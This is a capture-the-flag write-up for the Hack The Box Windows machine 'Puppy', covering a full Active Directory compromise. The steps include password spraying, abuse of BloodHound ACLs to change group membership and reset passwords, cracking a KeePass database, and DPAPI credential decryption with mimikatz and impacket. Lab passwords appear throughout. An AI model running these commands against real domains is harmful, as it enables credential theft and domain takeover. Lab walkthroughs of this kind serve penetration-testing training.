HTB | Puppy

This is a Windows box. You can find it here

IP - 10.10.11.70

MACHINE INFORMATION - As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Nmap

└─$ nmap -sT -p- --min-rate 10000 10.10.11.70 -Pn -oA nmap_ports                                                                                      
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-18 11:40 IST
Nmap scan report for 10.10.11.70
Host is up (0.25s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3260/tcp  open  iscsi
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
55152/tcp open  unknown
55178/tcp open  unknown
55214/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 38.32 seconds

└─$ nmap -sC -sV -p 53,88,111,135,139,389,445,464,593,636,2049,3260,3268,3269,5985,9389,49664,49669,49670,55152,55178,55214 10.10.11.70 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-18 11:45 IST
Nmap scan report for 10.10.11.70
Host is up (0.26s latency).

Bug in iscsi-info: no string output.
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-18 13:16:03Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3260/tcp  open  iscsi?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
55152/tcp open  msrpc         Microsoft Windows RPC
55178/tcp open  msrpc         Microsoft Windows RPC
55214/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-18T13:17:57
|_  start_date: N/A
|_clock-skew: 7h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 312.85 seconds

LDAP

└─$ ldapsearch -H ldap://10.10.11.70 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=PUPPY,DC=HTB
namingcontexts: CN=Configuration,DC=PUPPY,DC=HTB
namingcontexts: CN=Schema,CN=Configuration,DC=PUPPY,DC=HTB
namingcontexts: DC=DomainDnsZones,DC=PUPPY,DC=HTB
namingcontexts: DC=ForestDnsZones,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

From the above, we can confirm the DC name puppy.htb

Since we have credentials , we can use LDAP query

//to get all the user info
ldapsearch -H ldap://10.10.11.70 -x -b "DC=PUPPY,DC=HTB" -D "levi.james@puppy.htb" -w 'KingofAkron2025!' "(objectClass=user)"

Now we can copy the list of users

ldapsearch -H ldap://10.10.11.70 -x -b "DC=PUPPY,DC=HTB" -D "levi.james@puppy.htb" -w 'KingofAkron2025!' "(objectClass=user)" sAMAccountName

└─$ cat users.txt                                                                                        
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

Let’s use netexe to see if anyone is using levi’s password

└─$ netexec smb 10.10.11.70 -u users.txt -p 'KingofAkron2025!' --continue-on-success
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\\ant.edwards:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\\adam.silver:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\\jamie.williams:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\\steph.cooper:KingofAkron2025! STATUS_LOGON_FAILURE 
SMB         10.10.11.70     445    DC               [-] PUPPY.HTB\\steph.cooper_adm:KingofAkron2025! STATUS_LOGON_FAILURE 

So no one is using Levi’s password

Bloodhound

Since we have the credentials for the user, Let's use bloodhound-python for further enumeration

└─$ bloodhound-python -u levi.james -p 'KingofAkron2025!' -d puppy.htb -ns 10.10.11.70 -c All

Foothold/ shell

shell as adma.silver

GenericWrite

On analyzing bloodhound i can see LEVI.JAMES@PUPPY.HTB → MemberOf → HR@PUPPY.HTB → GenericWrite → DEVELOPERS@PUPPY.HTB We can exploit this to escalate privileges by adding Levi to the DEVELOPERS@puppy.htb group using the GenericWrite permission.

I have added levi to developers group

└─$ net rpc group addmem "Developers" "levi.james"  -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S 10.10.11.70

now levi have read access to DEV share

└─$ netexec smb 10.10.11.70 -u users.txt -p 'KingofAkron2025!' --shares
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [*] Enumerated shares
SMB         10.10.11.70     445    DC               Share           Permissions     Remark
SMB         10.10.11.70     445    DC               -----           -----------     ------
SMB         10.10.11.70     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.70     445    DC               C$                              Default share
SMB         10.10.11.70     445    DC               DEV             READ            DEV-SHARE for PUPPY-DEVS
SMB         10.10.11.70     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.70     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.70     445    DC               SYSVOL          READ            Logon server share 

keepass DB

Now we can list directory in DEV

└─$ smbmap -H 10.10.11.70 -u levi.james -p 'KingofAkron2025!' -r 'DEV' --dir-only

└─$ smbclient //10.10.11.70/DEV -U levi.james

We found krecovery.kdbx

Let’s download the file

smb: \\> mget recovery.kdbx 

└─$ file recovery.kdbx 
recovery.kdbx: Keepass password database 2.x KDBX

Since this version of keepass is not supported by johntheripper we will use keepass4brute

We have found the password

└─$ ./keepass4brute.sh ../recovery.kdbx /home/anurag/stuff/rockyou.txt

Let’s sue this password to open the recovery.kbdx

and we now have the clear text password for adam , anthony, jamie, samuel, steve

samuel and steve was not found earlier so i will add them in our user list

We will use kerbrute to check the valid username and password

└─$ ./kerbrute bruteforce --dc 10.10.11.70 -d puppy.htb creds.txt  -v

and we got the hit for ant.edwards

GenericAll

On analyzing bloodhound i can see ANT.EDWARDS@PUPPY.HTB → MemberOf → SENIOR DEVS@PUPPY.HTB → GenericAll → ADAM.SILVER@PUPPY.HTB

This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.

So we can change USER LOCKED OUT to unlock for the user adman.silver

We will use bloodAD for this

└─$ bloodyAD --host 10.10.11.70 -u ant.edwards -p '<PASSWORD>' remove uac adam.silver -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
                                                                                     

Since adam user was disable we need to reassign the password

└─$ net rpc password "adam.silver" 'P@ssw0rd@123' -U "puppy.htb"/"ant.edwards"%'Antman2025!' -S 10.10.11.70

or
└─$ bloodyAD --host 10.10.11.70 -u ant.edwards -p '<PASSWORD>' set password  adam.silver 'P@ssword!'
[+] Password changed successfully!

Now we can login

Now its time to login

└─$ evil-winrm -i 10.129.244.42 -u adam.silver -p 'P@ssword!'

found user.txt

Privilege Escalation

Shell as Steph.cooper

Backup folder

found Backup folder in C:\\

found site-backup-2024-12-30.zip , let’s download it and unzip

found nms-auth-config.xml.bak in which we found cred for steph.cooper

and we are in as steph.cooper

Shell as steph.cooper_adm

Saved credential - DPAI

We can see Microsoft Edge.lnk on the Desktop

Which would indicate usage of Microsoft Edge with a potentially saved password.

The system level cred are stored by DPAPI here

gci -force AppData\\Roaming\\Microsoft\\Credentials

the master key for these are stored here

gci -force AppData\\Roaming\\Microsoft\\Protect

Decrypt Credential — Decrypt Master Key

There are two method

• via mimikatz

• via impacket-dpapi

Via Mimikatz

The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.

Let's upload mimikatz to the box

Now we have to get the key

*Evil-WinRM* PS C:\\Users\\steph.cooper> .\\mimikatz.exe "dpapi::masterkey /in:C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1487982659-1829050783-2281216199-1107\\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc" exit

we have the key at the end. Now Let's try this key on the credential

.\\mimikatz.exe "dpapi::cred /in:C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Credentials\\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" exit

Now we have the credential for steph.cooper_adm

Via impacket-dpapi

We will convert the credential file into base64 so that we can transfer it to our machine (or we can simply download the file since we have evil-winrm)

gci -force AppData\\Roaming\\Microsoft\\Credentials

*Evil-WinRM* PS C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Credentials> [System.Convert]::ToBase64String((Get-Content C8D69EBE9A43E9DEBF6B5FBD48B521B9 -Encoding byte))

Decode it and write it on our machine.

echo "<BASE64 blob>" base64 -d > C8D69EBE9A43E9DEBF6B5FBD48B521B9

We will transfer the master key in similar manner

*Evil-WinRM* PS C:\\Users\\steph.cooper\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1487982659-1829050783-2281216199-1107> [System.Convert]::ToBase64String((Get-Content 556a2412-1275-4ccf-b721-e6a0b4f90407 -Encoding byte))

echo "<BASE64 BLOB> | base64 -d > 556a2412-1275-4ccf-b721-e6a0b4f90407

Now let’s use impacket-dapi to get the key

└─$ impacket-dpapi masterkey -file 556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password '<STEPH.COOPER PASSWORD>'

Now let’s use this key to get the credential

└─$ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key <KEY>

Since we have credentials of steph.cooper_adm we can login

and we got root.txt